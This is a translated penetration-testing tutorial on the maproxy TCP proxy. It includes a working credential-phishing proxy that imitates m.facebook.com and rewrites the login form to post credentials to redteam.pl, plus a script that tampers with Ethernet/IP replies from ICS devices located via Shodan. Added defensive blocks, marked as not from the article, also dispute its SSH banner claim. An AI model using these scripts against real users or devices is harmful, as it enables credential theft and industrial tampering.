Modifying network data on the fly

The translation of this article was prepared on the eve of the start of the course "Pentest. Penetration testing practice".


Summary

Various kinds of security assessments, from routine penetration tests and Red Team operations to hacking IoT/ICS and SCADA devices, involve working with binary network protocols, that is, essentially intercepting and modifying network data between the client and the target. Sniffing network traffic is not difficult, since we have tools such as Wireshark, Tcpdump or Scapy, but modification is a more labour-intensive task: we need some kind of interface to read the network data, filter it, change it on the fly and send it on to the target host in near real time. In addition, it would be ideal if such a tool could handle many connections automatically and could be customised with scripts.

One day I came across a tool called maproxy, and its documentation quickly made clear to me that maproxy is exactly what I needed. It is a fairly simple, versatile and easily configurable TCP proxy. I tested it against several relatively complex applications, including ICS devices (which generate a lot of packets), to see whether it could cope with many connections, and the tool performed very well.

This article introduces you to modifying network data on the fly with maproxy.

Overview

The maproxy tool is based on Tornado, a popular and mature asynchronous networking framework for Python.

In general, it can operate in several modes:

  • TCP:TCP - an unencrypted TCP connection;
  • TCP:SSL and SSL:TCP - encryption on one side only;
  • SSL:SSL - encryption on both sides.

It ships as a library. For a quick start you can use the example files, which demonstrate the library's main functionality:

  • all.py
  • certificate.pem
  • logging_proxy.py
  • privatekey.pem
  • ssl2ssl.py
  • ssl2tcp.py
  • tcp2ssl.py
  • tcp2tcp.py

Case 1 - a simple bidirectional proxy

Based on tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

# Forward every connection accepted on 2222/tcp to the SSH server on localhost:22.
server = maproxy.proxyserver.ProxyServer("localhost", 22)
server.listen(2222)
# Tornado's event loop drives all proxied connections; this call blocks.
tornado.ioloop.IOLoop.instance().start()

By default ProxyServer() takes two arguments: the target host and the target port. server.listen() takes one argument, the port on which to listen for incoming connections.

Run the script:

# python tcp2tcp.py

For the test we connect to the local SSH server through the proxy script, which listens on port 2222/tcp and connects to the SSH server's standard port 22/tcp. The welcome banner shows that our example script has successfully proxied the network traffic.

Case 2 - modifying data

Another demo script, logging_proxy.py, is intended for interacting with the network data. The comments in the file describe the class methods you can modify to achieve your goal.


The most interesting ones are:

  • on_c2p_done_read - for intercepting data on its way from the client to the server;
  • on_p2s_done_read - the reverse direction.

Let's try changing the SSH banner that the server returns to the client:

[…]
    def on_p2s_done_read(self, data):
        # server -> client direction: rewrite the software name in the SSH identification string
        data = data.replace(b"OpenSSH", b"DumnySSH")
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# the session factory is what makes the proxy use our LoggingSession subclass
server = maproxy.proxyserver.ProxyServer("localhost", 22, session_factory=LoggingSessionFactory())
server.listen(2222)
[…]

Running the script and connecting again: as you can see, the client was deceived, because the name of its SSH server has been changed to «DumnySSH».
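A caveat for this case, with an added example that is not from the article or from maproxy: what the client prints as the remote software version comes straight from the bytes it received, so the rewritten banner is what it displays, but SSH then binds both identification strings into the exchange hash H that the server's host-key signature covers (RFC 4253 section 8). The client computes H from the banner it saw, the server from the banner it sent, so the signature check at the client fails and the connection is torn down before authentication. For a defender, an unexplained run of failed key exchanges on a server is the signal that something on the path is rewriting the handshake. The transcript values below (KEXINIT payloads, host key blob, DH values) are constructed stand-ins, much shorter than real ones.

```python
import hashlib
import struct


# RFC 4253 section 5 wire encodings used inside the exchange hash.
def ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def ssh_mpint(n: int) -> bytes:
    """Minimal-length two's complement, big-endian, as RFC 4253 defines for positive values."""
    if n == 0:
        return ssh_string(b"")
    # (bit_length + 8) // 8 yields one extra 0x00 byte exactly when the top bit would be set.
    return ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def exchange_hash(v_c, v_s, i_c, i_s, k_s, e, f, k, hash_name="sha256"):
    """H = HASH(V_C || V_S || I_C || I_S || K_S || e || f || K) (RFC 4253 section 8),
    with V_C / V_S given without the trailing CR LF."""
    h = hashlib.new(hash_name)
    for piece in (ssh_string(v_c), ssh_string(v_s), ssh_string(i_c), ssh_string(i_s),
                  ssh_string(k_s), ssh_mpint(e), ssh_mpint(f), ssh_mpint(k)):
        h.update(piece)
    return h.digest()


# Constructed transcript values (assumptions for the demo; real KEXINIT payloads,
# host keys and DH values are far longer).
V_C = b"SSH-2.0-OpenSSH_9.3"
V_S = b"SSH-2.0-OpenSSH_8.9p1"
I_C = b"\x14" + b"\x00" * 16 + b"kex-algs-from-client"
I_S = b"\x14" + b"\x00" * 16 + b"kex-algs-from-server"
K_S = ssh_string(b"ssh-ed25519") + ssh_string(b"\x11" * 32)
E, F, K = 0x2F1A, 0x5C3D, 0x7E8B9A


def proxy_rewrite(banner: bytes) -> bytes:
    """The byte-for-byte substitution the Case 2 proxy applies to server->client data."""
    return banner.replace(b"OpenSSH", b"DumnySSH")


def kex_survives_rewrite(rewrite=proxy_rewrite) -> bool:
    """The server signs the H it computes over the banner it sent; the client verifies that
    signature against the H it computes from the banner it received. The two agree only if
    the identification string reached the client unmodified."""
    h_server = exchange_hash(V_C, V_S, I_C, I_S, K_S, E, F, K)
    h_client = exchange_hash(V_C, rewrite(V_S), I_C, I_S, K_S, E, F, K)
    return h_server == h_client


if __name__ == "__main__":
    print("untouched banner, key exchange completes:", kex_survives_rewrite(lambda b: b))
    print("rewritten banner, key exchange completes:", kex_survives_rewrite())
```

The same reasoning applies to any protocol whose handshake is transcript-bound (TLS hashes every handshake message into its Finished verification), which is why on-path rewriting of such protocols is limited to what is displayed before the handshake is verified, and why TCP:SSL and SSL:SSL proxying only works where the client accepts the proxy's certificate.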

Case 3 - a simple phishing web page

There are endless ways to use this tool. This time let's focus on something more practical from the Red Team operations side. We will imitate the m.facebook.com landing page and use a custom domain with a deliberate typo, for example m.facebok.com. For demonstration purposes let's simply assume that the domain is registered to us.

We will set up an unencrypted connection between the victim and the proxy, and an SSL stream from the proxy to the Facebook server (31.13.81.36). For this example to work we need to substitute the HTTP Host header, injecting the correct hostname, and we will also disable response compression so that the content is easy to access. Finally, we replace the HTML form so that the login credentials are sent to us instead of to the Facebook server:

[…]
    def on_c2p_done_read(self, data):
        # replace Host header
        data = data.replace(b"Host: m.facebok.com", b"Host: m.facebook.com")
        # disable compression
        data = data.replace(b"gzip", b"identity;q=0")
        data = data.replace(b"deflate", b"")
        super(LoggingSession, self).on_c2p_done_read(data)
[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response
        data = data.replace(b'action="/ha/login/"', b'action="https://redteam.pl/"')
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36", 443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

In short: as the screenshots showed, we successfully substituted the original site.

Case 4 - Ethernet/IP substitution

I have been dealing with industrial devices and software (ICS/SCADA) for some time: programmable logic controllers (PLCs), I/O modules, drives, relays, ladder-logic programming environments and much more. This case is for those who like industrial things. Hacking such solutions involves playing with network protocols. In the following example I want to show how you can modify ICS/SCADA network traffic.

For this you need the following:

  • a network sniffer, for example Wireshark;
  • an Ethernet/IP, or simply CIP, device; you can find one using the Shodan service;
  • our script based on maproxy.

First, let's look at what a typical discovery response from CIP (Common Industrial Protocol) looks like in a packet capture.


Device discovery is performed with the Ethernet/IP protocol, an adaptation of Ethernet for industrial use that encapsulates control protocols such as CIP. We will change the identity name visible in the screenshot, "NI-IndComm for Ethernet", using the proxy script. We can reuse the logging_proxy.py script again and modify the on_p2s_done_read class method, because we want a different name to be visible on the client.

The code:

[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response

        # Checking if we got a List Identity message response (item type 0x000C at offset 26)
        if data[26:28] == b'\x0c\x00':
            print('Got response, replacing')
            # the product name starts at offset 63; overwrite its first 10 bytes, keeping the length
            data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7", 44818, session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

Basically, we requested the device identity twice: the second response is the original one, and the first was modified on the fly.
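The offsets in the snippet above follow the Ethernet/IP ListIdentity layout: a 24-byte encapsulation header, a 2-byte item count, the item type at offset 26 (0x000C is the CIP identity item, hence the b'\x0c\x00' check), then the socket address and identity fields, the one-byte product-name length at offset 62 and the name itself from offset 63. The added example below is not from the article or from maproxy: it builds a constructed ListIdentity reply (the product name is taken from the screenshot, every other field is made up), parses and validates it, and runs the defensive check an asset owner would want, comparing what a device advertises on the wire against the asset inventory. Because the rewrite keeps every length field intact, the reply still parses cleanly, so only an inventory comparison (or a capture taken on the device's own segment) reveals the substitution.

```python
import struct

ENCAP_HEADER_LEN = 24       # command, length, session, status, sender context[8], options
CMD_LIST_IDENTITY = 0x0063
ITEM_CIP_IDENTITY = 0x000C  # the b'\x0c\x00' the proxy snippet tests at data[26:28]


def build_list_identity_response(product_name, vendor_id=0x0145, device_type=0x000C,
                                 product_code=0x0001, revision=(1, 2), status=0x0030,
                                 serial=0x12345678, ip=b"\xc0\xa8\x01\x0a", state=3):
    """Constructed sample ListIdentity reply (not captured from a real device)."""
    # The socket address is in network byte order; every other multi-byte field is little-endian.
    sockaddr = struct.pack(">HH4s8x", 2, 44818, ip)          # sin_family, sin_port, sin_addr, pad
    item = struct.pack("<H", 1) + sockaddr                   # encapsulation protocol version 1
    item += struct.pack("<HHHBBHI", vendor_id, device_type, product_code,
                        revision[0], revision[1], status, serial)
    item += struct.pack("<B", len(product_name)) + product_name + struct.pack("<B", state)
    body = struct.pack("<HHH", 1, ITEM_CIP_IDENTITY, len(item)) + item  # count, type, length
    header = struct.pack("<HHII8sI", CMD_LIST_IDENTITY, len(body), 0, 0, b"\x00" * 8, 0)
    return header + body


def parse_list_identity(data: bytes) -> dict:
    """Parse a ListIdentity reply, checking every length field; raises ValueError if malformed."""
    if len(data) < ENCAP_HEADER_LEN + 6:
        raise ValueError("reply shorter than encapsulation header plus item header")
    cmd, length, _session, status, _ctx, _opts = struct.unpack_from("<HHII8sI", data, 0)
    if cmd != CMD_LIST_IDENTITY:
        raise ValueError("unexpected command 0x%04x" % cmd)
    if status != 0:
        raise ValueError("encapsulation status 0x%08x" % status)
    if length != len(data) - ENCAP_HEADER_LEN:
        raise ValueError("encapsulation length does not match payload")
    item_count, item_type, item_len = struct.unpack_from("<HHH", data, ENCAP_HEADER_LEN)
    if item_count != 1 or item_type != ITEM_CIP_IDENTITY:
        raise ValueError("not a single CIP identity item")
    item_start = ENCAP_HEADER_LEN + 6                        # 30
    if item_start + item_len != len(data):
        raise ValueError("item length does not match payload")
    (proto_ver,) = struct.unpack_from("<H", data, item_start)
    _family, port, ip = struct.unpack_from(">HH4s", data, item_start + 2)
    vendor, dev_type, prod_code, rev_major, rev_minor, dev_status, serial = \
        struct.unpack_from("<HHHBBHI", data, item_start + 18)
    name_len = data[item_start + 32]                         # offset 62
    name_off = item_start + 33                               # offset 63, as in the proxy snippet
    name = data[name_off:name_off + name_len]
    if len(name) != name_len or name_off + name_len + 1 != len(data):
        raise ValueError("product name length does not fit the item")
    return {
        "protocol_version": proto_ver,
        "ip": ".".join(str(b) for b in ip), "port": port,
        "vendor_id": vendor, "device_type": dev_type, "product_code": prod_code,
        "revision": (rev_major, rev_minor), "status": dev_status, "serial": serial,
        "product_name": name, "state": data[name_off + name_len],
    }


def inventory_findings(data: bytes, expected: dict) -> list:
    """Defensive check: report identity fields that differ from the asset inventory record."""
    ident = parse_list_identity(data)
    findings = []
    for key in ("product_name", "vendor_id", "serial"):
        if ident[key] != expected[key]:
            findings.append("%s: advertised %r, inventory %r" % (key, ident[key], expected[key]))
    return findings


if __name__ == "__main__":
    # Inventory record and sample reply are both constructed for the demo.
    inventory = {"product_name": b"NI-IndComm for Ethernet", "vendor_id": 0x0145, "serial": 0x12345678}
    genuine = build_list_identity_response(inventory["product_name"])
    # Same in-place rewrite as the proxy snippet: 10 bytes from offset 63, length fields untouched.
    rewritten = genuine[:63] + b"DUMMY31337" + genuine[73:]
    for label, reply in (("genuine", genuine), ("rewritten", rewritten)):
        ident = parse_list_identity(reply)
        print(label, ident["product_name"], inventory_findings(reply, inventory) or "matches inventory")
```

The parser rejects replies whose length fields disagree with the bytes actually received, which is the first thing to check before trusting any field; the inventory comparison is what catches a consistent but substituted identity.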

And finally

In my opinion maproxy is a convenient and simple tool, and one written in Python, so I believe you can benefit from using it too. Of course, there are more sophisticated tools for manipulating and modifying network data, but they also require more attention and are usually built for specific use cases, for example Muraena, Modlishka or evilginx for cases like the third one, or canape for the last case. Either way, with maproxy you can quickly implement your ideas for intercepting network data, since the example scripts are clear.


source: www.habr.com
